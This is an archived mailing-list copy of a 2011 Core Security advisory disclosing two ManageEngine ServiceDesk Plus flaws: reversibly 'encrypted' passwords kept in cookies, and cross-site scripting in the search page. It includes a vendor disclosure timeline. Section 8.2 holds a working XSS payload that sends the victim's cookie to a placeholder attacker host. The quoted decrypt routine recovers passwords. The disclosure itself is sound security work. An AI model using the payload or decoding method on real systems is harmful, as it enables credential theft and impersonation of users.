lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4E71164B.5080200@coresecurity.com>
Date: Wed, 14 Sep 2011 18:02:03 -0300
From: CORE Security Technologies Advisories <advisories@...esecurity.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>, 
	bugtraq <bugtraq@...urityfocus.com>
Subject: CORE-2011-0506 - Multiples Vulnerabilities in
 ManageEngine ServiceDesk Plus

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Multiples Vulnerabilities in ManageEngine ServiceDesk Plus


1. *Advisory Information*

Title: Multiples Vulnerabilities in ManageEngine ServiceDesk Plus
Advisory ID: CORE-2011-0506
Advisory URL:
http://www.coresecurity.com/content/multiples-vulnerabilities-manageengine-sdp
Date published: 2011-09-14
Date of last update: 2011-09-14
Vendors contacted: ManageEngine
Release mode: User release


2. *Vulnerability Information*

Class: Authentication issues [CWE-287], Cross site scripting [CWE-79]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1509, CVE-2011-1510


3. *Vulnerability Description*

ManageEngine ServiceDesk Plus is a complete web based and ITIL ready
service desk software with integrated asset management developed by
ManageEngine, the Enterprise IT Management Software division of Zoho
Corporation [1].

The authentication process of ServiceDesk Plus obfuscates user passwords
using a trivial and symmetrical algorithm in Javascript code with no
secret. Given that user passwords are locally stored in user cookies and
having the Javascript code to encrypt and decrypt passwords in a .js
file , the authentication process of ServiceDesk Plus can be bypassed
allowing an attacker to get usernames+passwords of registered users.

Additionally, a cross site scripting vulnerability related to search
functions was found.


4. *Vulnerable packages*

   . ManageEngine ServiceDesk Plus 8.0.0 Professional edition.
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . Contact vendor for further information.


6. *Vendor Information, Solutions and Workarounds*

Regarding the vulnerability issue in 'SearchSolution' page
[CVE-2011-1510], the SDP team has identified this vulnerability
[2011-05-16] and it was fixed in SDP 8012, June 2011. ManageEngine did
not provide technical information, workaround nor a clear timeline for
fixes regarding [CVE-2011-1509]. Please, contact vendor for further
information and patches.


7. *Credits*

This vulnerability was discovered and researched by Matias Blanco from
Core Security Technologies.


8. *Technical Description / Proof of Concept Code*

8.1. *Authentication Weakness*

[CVE-2011-1509] User passwords are pseudo encrypted and locally stored
in user cookies. This encryption is symmetrical using Caesar Cipher with
no salt or secret, having the Javascript code encrypt and decrypt
passwords in 'Login.js' file.

/-----
/* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */
   ...
12
13 function encryptPassword(textPassword)
14 {
15   var num_out = "";
16   var str_in = escape(textPassword);
17   for(i = 0; i < str_in.length; i++)
18   {
19      num_out += str_in.charCodeAt(i) - 23;
20   }
21   return num_out;
22 }
23

-----/


/-----
/* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */
   ...
23
24 function decryptPassword(encPassword)
25 {
26   var str_out = "";
27   var num_out = encPassword;
28   for(i = 0; i < num_out.length; i += 2)
29   {
30     num_in = parseInt(num_out.substr(i,[2])) + 23;
31     num_in = unescape('%' + num_in.toString(16));// No I18N
32     str_out += num_in;
33   }
34   var textPassword = unescape(str_out);
35   return textPassword ;
36 }
37

-----/
 So, if the attacker succeeded in trying to steal the cookie, he can
easily decrypt it and get the original password. Given that the username
is also stored in plaintext in the cookie, this can lead to
impersonation and identity theft.


8.2. *Cross-Site Scripting*

[CVE-2011-1510] There is a lack of sanitization in the 'searchText'
parameter located in the 'SolutionSearch.do' page. An external attacker
can obtain the password of an authenticated ManageEngine user by making
this request:

/-----
https://[vulnerable_site]/SolutionSearch.do?searchText=';var
el=document.createElement('img');el.src='http://[malicious_site]?pass='%2Bdocument.cookie;document.documentElement.appendChild(el);'
-----/

 This request performs an HTTP request to a webserver controlled by the
attacker, 'http://[malicious_site]', sending the cookie that includes
the predictable password.


9. *Report Timeline*

. 2011-05-12:
Initial notification to the vendor. Publication date set to June 7th, 2011.

. 2011-05-13:
The Service Desk team asks Core for a technical description of the
vulnerability.

. 2011-05-13:
Technical details sent to Service Desk team.

. 2011-05-16:
The Service Desk team notifies they are analyzing the [CVE-2011-1509]
issue and it will take them some time to fix it. The issue
[CVE-2011-1510] was identified and it will be fixed in SDP 8012, which
is expected by the end of May 2011.

. 2011-05-23:
Core requests to clarify whether the problems will be released
altogether or in two release cycles.

. 2011-05-27:
The Service Desk team notifies the issue [CVE-2011-1510] will be fixed
in the upcoming hotfix 8012, which is currently under validation phase
and is expected to get released by next week. Regarding the encryption
issue [CVE-2011-1509], the Service Desk team notifies they will have to
work on that and will not be able to provide a fix by June 7th 2011.

. 2011-06-02:
Core states that neither the progress status nor the release date for
the fix of [CVE-2011-1509] have been notified. Core also claims that the
advisory publication was rescheduled to Jun 21st, and requests a clear
timeline.

. 2011-06-07:
The Service Desk team notifies that they have not been working on this
issue. Once the next product release is over they will get started on
the analysis.

. 2011-06-07:
First release date missed.

. 2011-06-21:
Second release date missed.

. 2011-06-23:
Core notifies that the vulnerability was reported 5 weeks ago
[2011-05-12], 2 release dates were already missed, and requests an
update on the status as soon as possible in order to assess the situation.

. 2011-07-08:
Core notifies that is not possible to keep the process coordinated
without the requested information and reschedules the advisory to be
published on July 19th as 'User Release'.

. 2011-07-08:
The Service Desk team notifies that they have started analyzing
[CVE-2011-1509] and working on various solutions to get this fixed. The
vendor also notifies that they will try to roll the patches on the 8.1
release, which is expected in 2 months' time from now.

. 2011-07-18:
Core considers bad practice to postpone the patch release 2 months until
a new version of the product is available (since it may suffer
engineering delays that have nothing to do with the reported security
issue itself). As a result, Core offers to reschedule the advisory
publication to Aug 9th, providing additional time to the vendor for
developing patches and/or the appropriate mitigation actions, until the
version 8.1 comes to light.

. 2011-07-19:
Third release date missed.

. 2011-08-08:
Core requests a status update and notifies the advisory is currently
scheduled to be published tomorrow, Aug 9th. Core also requests to
clarify if the vendor will release fixes for previous vulnerable
versions of ManageEngine.

. 2011-08-09:
Manage Engine team notifies they have not fixed the issue yet and
customers will have to upgrade to the latest version to get a fixed
version of the product.

. 2011-08-09:
Fourth release date missed.

. 2011-08-12:
Core notifies that the release date was missed and requests to clarify a
new estimated date for disclosure. Core also requests additional
technical information regarding the fix and how Manage Engine team is
going to resolve the weakness in the authentication process. Core also
requests to clarify if customers of old versions will have to pay for
the latest (patched) version or they will be able to download free patches.

. 2011-08-16:
Manage Engine team notifies that there could be a delay of about a month
for a release candidate; technical details will be released once they
decide on the final implementation. Vendor also notifies that the
upgrade from a earlier version to a new version is free. A patch will be
available in the site for the upgrades.

. 2011-08-18:
Core notifies that given:
   1. this flaw was reported 3 months ago [2011-05-12],
   2. 4th release dates were already missed,
   3. SDP is postponing the release of patch until a new version of the
product is available,
   4. and the lack of technical information about how and when SDP will
patch this flaw;

 Core has decided to re-schedule the advisory to Sep 13th and this
should be considered as a final date.

. 2011-09-14:
CORE-2011-0506 is published.


10. *References*

[1] ManageEngine ServiceDesk Plus
http://www.manageengine.com/products/service-desk.


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and prove real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



Download attachment "signature.asc" of type "application/pgp-signature" (261 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ